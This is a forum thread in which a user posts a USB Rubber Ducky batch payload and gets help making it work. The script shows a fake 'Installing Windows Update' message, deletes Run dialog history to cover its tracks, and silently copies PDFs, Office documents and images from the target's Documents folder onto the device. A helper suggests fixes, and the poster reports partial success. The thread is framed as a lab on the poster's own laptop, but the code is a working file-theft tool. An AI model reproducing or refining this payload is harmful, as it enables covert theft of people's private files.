Rubber Ducky Stealing File lab - Not able to grab files

[bcreech85]

Hello,

I managed to get my ducky to create a folder under slurp directory. I am trying to get it to steal all the file formats I listed in the e.cmd off my targeted laptop (old laptop window 10). After the rubber duck is done, I opened the slurp folder, go to the new created folder with the computer name, date,etc. There is nothing inside the new folder. Is there anything I am missing on the code below? 

 

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.doc %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.docx %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.xlsx %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpg %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.png %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.gif %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit

[chrizree]

On what drive do you store the script? Are you using stock Ducky firmware or have you flashed some alternative variant?

[bcreech85]

Hello,

My rubber ducky is using the Ducky-flasher method I believe (it the one with the GUI and you press 4 for twin-duck, etc). I stored the e.cmd, d.cmd and i.vbs along side the inject.bin on the rubber ducky drive. I also have a folder called slurp on there as well. Once I insert the rubber ducky, it will do 95% of it magic. Creating a folder under slurp but not stealing the files from my test laptop.

[chrizree]

And if you run the commands "manually" on your victim PC (content of e.cmd), do you get the desired results (I know, it won't be the exact same result since it won't be storing anything on your Ducky, but it will make it possible to catch some errors)? If you're not on a US (or US like system with that kind of date format), the folders created will be named with something that looks like a mess. Not that it should stop anything, but it could need some "remapping" to look proper. I don't really think that you have a missing Documents folder on your "victim" PC, but it could for sure be a reason why no loot is captured since the if statement verifies the existence of that directory. I tried the batch file line by line (well, the important stuff of it at least) and it was executing without any real issues. I don't have any alternative firmware on my Ducky, and I won't flash any since I want it stock, so I haven't tried it all with a Ducky, hence not fully replicating your scenario. I could use a Bunny but it wouldn't be all that helpful since it's not the same scenario as you have (even though closely mimicing it). Language is perhaps an issue. Are you doing it on a non US system?

[bcreech85]

I am using it on the US system. When clicking the e.cmd manually, I get a quick "invalid numbers of parameters" from the cmd prompt before it disappeared follow by a new folder what look to be the time,85151 "8:51:51AM"

[chrizree]

try to edit the cmd file temporarily and skip the date/time stuff in the folder creation and run it once and see if it works better, that date/time stamp most likely needs to be modified before it can be used, i.e. the script needs to be altered so that it creates a date/time output that can be used without issues, just create a directory in the script called "test" as a subdir to slurp:

set dst=%~d0\slurp\test

You can also add PAUSE or SLEEP s (where s is number of seconds to sleep) to the end of the script so that you can catch the output

I'm kind of rusty when it comes to Windows, SLEEP might not work, TIMEOUT probably, but PAUSE works anyway...

or... simply run the script from an already opened Command Prompt, that will keep the window/prompt open (unless you have the exit command left in your script file, REM it in that case). Double clicking on a cmd file will just make it execute and close regardless if it includes an exit or not

[bcreech85]

I performed the suggestion you made above. Simplify the progress by eliminating all the time and date after computer name and add test next to slurp. I also eliminated all the other file formats, just leaving the pdf one. So far good news, it was able to create a computer name file under test folder and grab 1 pdf versus multiple pdf store in the document folder. Now all I got to do is figure out how to grab all the pdf file it see in the document folder.

 

Thank you for your help!

[chrizree]

ok, great news, splitting things up to verify each part separately is always a good approach when experiencing issues similar to this situation, I can't see any problems for you to get it all working as intended